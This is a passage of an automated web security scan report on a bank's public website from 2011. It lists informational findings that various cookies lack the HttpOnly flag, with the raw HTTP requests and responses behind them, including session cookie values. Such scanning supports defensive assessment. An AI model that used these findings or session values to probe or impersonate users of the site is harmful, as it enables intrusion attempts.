The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /checking/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:36 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=Q3cLNJhQSJXJ01dhNTVGyQlHhTNfcGvp2PwmMkwzDRSyBnTQJh5n!1192939746; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2515819274.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Checking Account - Compa
...[SNIP]...

11.689. https://www.wellsfargo.com/com/comintro  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /com/comintro

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /com/comintro HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:25 GMT
Location: https://www.wellsfargo.com/com/
Set-Cookie: wcmcookiewf=hdNDNJhFB2Vy1gQG4jHHJMtydYJQ6bLJT7Jc3x03KXZTLVhH4VKx!312685559; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2264161034.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/com/">h
...[SNIP]...

11.690. https://www.wellsfargo.com/credit_cards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /credit_cards/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /credit_cards/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:38 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=lcphNJhSDNXQXcnvvp6Pqwv3mHjKLNpN7rmll0htLDpp25KdLbp1!-88744709; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2532596490.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Credit Cards
...[SNIP]...

11.691. https://www.wellsfargo.com/credit_cards/select_card  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /credit_cards/select_card

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /credit_cards/select_card HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:38 GMT
Location: https://www.wellsfargo.com/credit_cards/
Set-Cookie: wcmcookiewf=cnHtNJhSv05Mv5yd9N4HJR2wQH8TNThgFHky9sygWXwY8CTHxjHQ!-1273606700; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1777621770.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/credit_
...[SNIP]...

11.692. https://www.wellsfargo.com/equity/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /equity/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /equity/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:44 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=2TyTNJhY3JchnGmJ4bFhFZNhrNjKnLLw809GTQGsf17zgJWCnCyt!-530822505; domain=.wellsfargo.com; path=/; secure
Set-Cookie: msc=5572; domain=.wellsfargo.com; expires=Friday, 04-Mar-2011 22:29:44 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=2129943306.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Home Equity Loans & Li
...[SNIP]...

11.693. https://www.wellsfargo.com/equity/rate_payments/information/rate_calc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /equity/rate_payments/information/rate_calc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /equity/rate_payments/information/rate_calc HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:44 GMT
Location: https://www.wellsfargo.com/equity/tools/rate_calc
Set-Cookie: wcmcookiewf=LG9sNJhYpZTn2Dhm7pS2x0hcpW0hNsZJG2QzvpSYMRFWGZJ5tRlh!-705334509; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2163497738.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/equity/
...[SNIP]...

11.694. https://www.wellsfargo.com/help/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /help/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:21 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=fTG5NJhBTvhh8THS9LpgByvt7m89Gy4r1dsVhd3yzr8nQnnF6vzk!349572437; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Customer Service f
...[SNIP]...

11.695. https://www.wellsfargo.com/help/faqs/signon_faqs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /help/faqs/signon_faqs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/faqs/signon_faqs HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:22 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=vXXtNJhCXy5g11qrwqXKMTLPF3dHrhGLJvg8Wj9MRTTBXJmf9lQT!-1136720127; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head><title>Wells Fargo Username/Password Hel
...[SNIP]...

11.696. https://www.wellsfargo.com/help/services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /help/services

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/services HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:23 GMT
Content-length: 11416
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=TYQnNJhDw4QJgQtW7VVtnt2LBv3VJm8hq3Dj4zygqfRB09vyWKnn!191917939; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Customer Service -
...[SNIP]...

11.697. https://www.wellsfargo.com/insurance/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /insurance/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /insurance/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:54 GMT
Content-length: 8678
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=FYpQNJhCkvzKSyh2MqHzf7L6MkTTHxnLMf7gMw7y6G64TqKC2T9m!-88744709; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2532596490.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Insurance
...[SNIP]...

11.698. https://www.wellsfargo.com/insurance/id_credit_protection/idtheft  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /insurance/id_credit_protection/idtheft

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /insurance/id_credit_protection/idtheft HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:55 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=9hF3NJhDTdc9PnjFnWG989NpqqdGyhQPmS2jnC9JQXqKM20QvTm9!-1136720127; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Identity Theft Protection - Id
...[SNIP]...

11.699. https://www.wellsfargo.com/investing/hsa/enroll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /investing/hsa/enroll

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /investing/hsa/enroll HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:52 GMT
Content-length: 9955
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=rGCpNJhQ3J2yYLGgChygHTVGrrYQnxRYXjGV7X8q1RBBkR0MCZRz!1893615402; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1727290122.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Health Savings Acc
...[SNIP]...

11.700. https://www.wellsfargo.com/investing/investmentservices/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /investing/investmentservices/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /investing/investmentservices/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:50 GMT
Content-length: 8732
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=3JcNNJhpcnnt2lQ8QP1vrTvQjGQzrsnrVYcCqTsht4tMhdvxRqh3!1507309987; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2046057226.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Investment Services</tit
...[SNIP]...

11.701. https://www.wellsfargo.com/investing/more  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /investing/more

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /investing/more HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:51 GMT
Content-length: 12093
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=2H4zNJhfczGZqD2NxFyn8Gw3cRRJsvd31PWX0Bjp5vwZRm5mlXBy!898739336; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Investing</t
...[SNIP]...

11.702. https://www.wellsfargo.com/investing/mutual_funds/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /investing/mutual_funds/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /investing/mutual_funds/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:50 GMT
Content-length: 12036
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=jrPSNJhptZ2KBS3w22FGDn8wnzWjhJTmp2lJ153w81CP30LvyQTs!1746616152; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2146720522.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Mutual Fund Center
...[SNIP]...

11.703. https://www.wellsfargo.com/investing/retirement/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /investing/retirement/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /investing/retirement/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:50 GMT
Content-length: 9837
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=72X3NJhdnllJ1jBN4whcFnn1dmL5hH6sM9yrH5Lk27rBF3pGF0Tb!215502378; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1844730634.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Retirement Accounts, P
...[SNIP]...

11.704. https://www.wellsfargo.com/investing/retirement/openira/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /investing/retirement/openira/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /investing/retirement/openira/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:50 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=YJV8NJhdhdMLGnSv274NzJTQHrvNQ2n3CBLWGMBzrdc8XGhTGsbN!-1672152970; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Open an IRA (Individual Retire
...[SNIP]...

11.705. https://www.wellsfargo.com/jump/about/fdic  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/about/fdic

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jump/about/fdic HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:08 GMT
Content-length: 9678
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=x1trNJhJGTGqVyL185v7GXzvQBCvYpMvVYwVg3sGTsGMgTVGz2YG!-1408825807; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1693735690.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

11.706. https://www.wellsfargo.com/jump/applications/inprogress  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/applications/inprogress

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jump/applications/inprogress HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:07 GMT
Content-length: 4747
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=6WsvNJhTXvxJ1jsxDf1m1Gy1rlbWnMwpT7vJFPgxrMwwt58cy9lN!-213655893; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2448710410.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

11.707. https://www.wellsfargo.com/jump/wachovia/EFS/WAC1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/wachovia/EFS/WAC1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jump/wachovia/EFS/WAC1 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:05 GMT
Content-length: 6663
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=LfRNNJhRvn61Cp8bXrFGLwg6QQKWryy89ht4J427MtcBftWn8JsH!898739336; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/
Connection: close


